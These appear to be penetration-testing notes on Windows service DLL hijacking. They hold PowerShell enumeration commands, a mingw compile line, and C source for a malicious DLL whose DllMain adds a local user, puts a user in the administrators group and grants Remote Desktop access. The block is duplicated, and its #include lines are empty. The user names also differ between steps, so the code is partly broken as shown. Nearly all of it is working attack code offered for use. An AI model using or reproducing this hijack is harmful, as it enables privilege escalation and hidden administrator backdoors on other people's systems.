SERVICE DLL HIJACK Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
icacls .\Documents\vuln.exe
$env:path
x86_64-w64-mingw32-gcc myDLL.cpp --shared -o myDLL.dll
#include
#include
BOOL APIENTRY DllMain(
HANDLE hModule,// Handle to DLL module
DWORD ul_reason_for_call,// Reason for calling function
LPVOID lpReserved ) // Reserved
{
switch ( ul_reason_for_call )
{
case DLL_PROCESS_ATTACH: // A process is loading the DLL.
int i;
i = system ("net user g00f1x password123! /add");
i = system ("net localgroup administrators dave2 /add");
i = system ("net localgroup \"Remote Desktop Users\" \"dave2\" /add");
break;
case DLL_THREAD_ATTACH: // A process is creating a new thread.
break;
case DLL_THREAD_DETACH: // A thread exits normally.
break;
case DLL_PROCESS_DETACH: // A process unloads the DLL.
break;
}
return TRUE;
}
icacls .\Documents\vuln.exe
$env:path
x86_64-w64-mingw32-gcc myDLL.cpp --shared -o myDLL.dll
#include
#include
BOOL APIENTRY DllMain(
HANDLE hModule,// Handle to DLL module
DWORD ul_reason_for_call,// Reason for calling function
LPVOID lpReserved ) // Reserved
{
switch ( ul_reason_for_call )
{
case DLL_PROCESS_ATTACH: // A process is loading the DLL.
int i;
i = system ("net user g00f1x password123! /add");
i = system ("net localgroup administrators dave2 /add");
i = system ("net localgroup \"Remote Desktop Users\" \"dave2\" /add");
break;
case DLL_THREAD_ATTACH: // A process is creating a new thread.
break;
case DLL_THREAD_DETACH: // A thread exits normally.
break;
case DLL_PROCESS_DETACH: // A process unloads the DLL.
break;
}
return TRUE;
}